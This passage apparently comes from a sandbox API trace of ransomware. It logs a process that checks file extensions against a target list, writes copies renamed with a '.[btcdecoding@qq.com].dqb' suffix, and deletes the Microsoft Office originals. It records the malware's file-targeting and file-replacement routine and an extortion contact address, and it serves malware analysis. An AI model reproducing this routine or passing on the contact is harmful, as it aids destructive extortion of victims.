lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.821] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f14078 | out: hHeap=0x570000) returned 1 [0050.821] CloseHandle (hObject=0x224) returned 1 [0050.821] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0050.821] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.821] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.821] lstrlenW (lpString=".doc") returned 4 [0050.821] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.821] lstrlenW (lpString=".docx") returned 5 [0050.821] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.821] lstrlenW (lpString=".pdf") returned 4 [0050.821] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.821] lstrlenW (lpString=".xls") returned 4 [0050.821] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.821] lstrlenW (lpString=".xlsx") returned 5 [0050.821] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.822] lstrlenW (lpString=".ppt") returned 4 [0050.822] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.822] lstrlenW (lpString=".zip") returned 4 [0050.822] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.822] lstrlenW (lpString=".rar") returned 4 [0050.822] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.822] lstrlenW (lpString=".bz2") returned 4 [0050.822] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.822] lstrlenW (lpString=".7z") returned 3 [0050.822] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.822] lstrlenW (lpString=".dbf") returned 4 [0050.822] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.822] lstrlenW (lpString=".1cd") returned 4 [0050.822] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.822] lstrlenW (lpString=".jpg") returned 4 [0050.822] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.822] lstrlenW (lpString=".doc") returned 4 [0050.822] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.822] lstrlenW (lpString=".docx") returned 5 [0050.822] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.822] lstrlenW (lpString=".pdf") returned 4 [0050.822] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.822] lstrlenW (lpString=".xls") returned 4 [0050.822] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.822] lstrlenW (lpString=".xlsx") returned 5 [0050.822] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.822] lstrlenW (lpString=".ppt") returned 4 [0050.822] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.822] lstrlenW (lpString=".zip") returned 4 [0050.823] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.823] lstrlenW (lpString=".rar") returned 4 [0050.823] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.823] lstrlenW (lpString=".bz2") returned 4 [0050.823] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.823] lstrlenW (lpString=".7z") returned 3 [0050.823] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.823] lstrlenW (lpString=".dbf") returned 4 [0050.823] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.823] lstrlenW (lpString=".1cd") returned 4 [0050.823] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.823] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0050.823] lstrlenW (lpString=".jpg") returned 4 [0050.823] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.823] lstrcmpiW (lpString1=".EXE", lpString2=".dqb") returned 1 [0050.823] lstrlenW (lpString="DW20.EXE") returned 8 [0050.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.372] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=994184) returned 1 [0051.372] CloseHandle (hObject=0x204) returned 1 [0051.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 0x20 [0051.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.372] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.372] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.372] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.372] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0051.385] GetLastError () returned 0x0 [0051.385] ReadFile (in: hFile=0x204, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0xf2b88, lpOverlapped=0x0) returned 1 [0051.405] WriteFile (in: hFile=0x1a4, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xf2b90, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xf2b90, lpOverlapped=0x0) returned 1 [0051.454] ReadFile (in: hFile=0x204, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.454] WriteFile (in: hFile=0x1a4, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe4, lpOverlapped=0x0) returned 1 [0051.454] SetEndOfFile (hFile=0x1a4) returned 1 [0051.455] CloseHandle (hObject=0x1a4) returned 1 [0051.455] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.455] SetEndOfFile (hFile=0x204) returned 1 [0051.463] CloseHandle (hObject=0x204) returned 1 [0051.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.463] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 1 [0051.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.463] lstrlenW (lpString=".doc") returned 4 [0051.463] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.463] lstrlenW (lpString=".docx") returned 5 [0051.463] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.463] lstrlenW (lpString=".pdf") returned 4 [0051.463] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.463] lstrlenW (lpString=".xls") returned 4 [0051.463] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.463] lstrlenW (lpString=".xlsx") returned 5 [0051.463] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.463] lstrlenW (lpString=".ppt") returned 4 [0051.463] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.464] lstrlenW (lpString=".zip") returned 4 [0051.464] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.464] lstrlenW (lpString=".rar") returned 4 [0051.464] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.464] lstrlenW (lpString=".bz2") returned 4 [0051.464] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.464] lstrlenW (lpString=".7z") returned 3 [0051.464] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.464] lstrlenW (lpString=".dbf") returned 4 [0051.464] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.464] lstrlenW (lpString=".1cd") returned 4 [0051.464] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.464] lstrlenW (lpString=".jpg") returned 4 [0051.464] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.464] lstrlenW (lpString=".doc") returned 4 [0051.464] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.464] lstrlenW (lpString=".docx") returned 5 [0051.464] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.464] lstrlenW (lpString=".pdf") returned 4 [0051.464] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.464] lstrlenW (lpString=".xls") returned 4 [0051.464] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.464] lstrlenW (lpString=".xlsx") returned 5 [0051.464] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.464] lstrlenW (lpString=".ppt") returned 4 [0051.464] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.465] lstrlenW (lpString=".zip") returned 4 [0051.465] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.465] lstrlenW (lpString=".rar") returned 4 [0051.465] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.465] lstrlenW (lpString=".bz2") returned 4 [0051.465] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.465] lstrlenW (lpString=".7z") returned 3 [0051.465] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.465] lstrlenW (lpString=".dbf") returned 4 [0051.465] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.465] lstrlenW (lpString=".1cd") returned 4 [0051.465] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58 [0051.465] lstrlenW (lpString=".jpg") returned 4 [0051.465] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.465] lstrcmpiW (lpString1=".HLP", lpString2=".dqb") returned 1 [0051.465] lstrlenW (lpString="EQNEDT32.HLP") returned 12 [0051.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.466] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=176311) returned 1 [0051.466] CloseHandle (hObject=0x204) returned 1 [0051.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 0x20 [0051.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.466] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.466] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.466] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.466] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0051.467] GetLastError () returned 0x0 [0051.467] ReadFile (in: hFile=0x204, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x2b0b7, lpOverlapped=0x0) returned 1 [0051.471] WriteFile (in: hFile=0x1a4, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x2b0c0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x2b0c0, lpOverlapped=0x0) returned 1 [0051.474] ReadFile (in: hFile=0x204, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.474] WriteFile (in: hFile=0x1a4, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.474] SetEndOfFile (hFile=0x1a4) returned 1 [0051.474] CloseHandle (hObject=0x1a4) returned 1 [0051.475] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.475] SetEndOfFile (hFile=0x204) returned 1 [0051.476] CloseHandle (hObject=0x204) returned 1 [0051.476] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.477] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 1 [0051.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.477] lstrlenW (lpString=".doc") returned 4 [0051.477] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0051.477] lstrlenW (lpString=".docx") returned 5 [0051.477] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1 [0051.477] lstrlenW (lpString=".pdf") returned 4 [0051.477] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0051.477] lstrlenW (lpString=".xls") returned 4 [0051.477] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0051.477] lstrlenW (lpString=".xlsx") returned 5 [0051.477] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1 [0051.477] lstrlenW (lpString=".ppt") returned 4 [0051.477] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0051.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.477] lstrlenW (lpString=".zip") returned 4 [0051.477] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0051.477] lstrlenW (lpString=".rar") returned 4 [0051.477] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0051.477] lstrlenW (lpString=".bz2") returned 4 [0051.477] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0051.477] lstrlenW (lpString=".7z") returned 3 [0051.477] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0051.477] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.477] lstrlenW (lpString=".dbf") returned 4 [0051.478] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0051.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.478] lstrlenW (lpString=".1cd") returned 4 [0051.478] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0051.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.478] lstrlenW (lpString=".jpg") returned 4 [0051.478] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0051.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.478] lstrlenW (lpString=".doc") returned 4 [0051.478] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0051.478] lstrlenW (lpString=".docx") returned 5 [0051.478] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1 [0051.478] lstrlenW (lpString=".pdf") returned 4 [0051.478] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0051.478] lstrlenW (lpString=".xls") returned 4 [0051.478] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0051.478] lstrlenW (lpString=".xlsx") returned 5 [0051.478] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1 [0051.478] lstrlenW (lpString=".ppt") returned 4 [0051.478] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0051.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.478] lstrlenW (lpString=".zip") returned 4 [0051.478] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0051.478] lstrlenW (lpString=".rar") returned 4 [0051.478] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0051.478] lstrlenW (lpString=".bz2") returned 4 [0051.478] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0051.478] lstrlenW (lpString=".7z") returned 3 [0051.478] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0051.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.478] lstrlenW (lpString=".dbf") returned 4 [0051.478] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0051.478] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.478] lstrlenW (lpString=".1cd") returned 4 [0051.478] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0051.479] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.479] lstrlenW (lpString=".jpg") returned 4 [0051.479] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0051.479] lstrcmpiW (lpString1=".TTF", lpString2=".dqb") returned 1 [0051.479] lstrlenW (lpString="MTEXTRA.TTF") returned 11 [0051.479] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.479] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=7656) returned 1 [0051.479] CloseHandle (hObject=0x204) returned 1 [0051.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 0x20 [0051.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0051.479] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.479] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.480] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.480] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0051.480] GetLastError () returned 0x0 [0051.480] ReadFile (in: hFile=0x204, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x1de8, lpOverlapped=0x0) returned 1 [0051.492] WriteFile (in: hFile=0x1a4, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x1df0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x1df0, lpOverlapped=0x0) returned 1 [0051.494] ReadFile (in: hFile=0x204, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0051.494] WriteFile (in: hFile=0x1a4, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0051.495] SetEndOfFile (hFile=0x1a4) returned 1 [0051.495] CloseHandle (hObject=0x1a4) returned 1 [0051.495] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0051.495] SetEndOfFile (hFile=0x204) returned 1 [0051.495] CloseHandle (hObject=0x204) returned 1 [0051.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.496] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf")) returned 1 [0051.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF") returned 67 [0051.496] lstrlenW (lpString=".doc") returned 4 [0051.496] lstrcmpiW (lpString1=".doc", lpString2=".TTF") returned -1 [0051.496] lstrlenW (lpString=".docx") returned 5 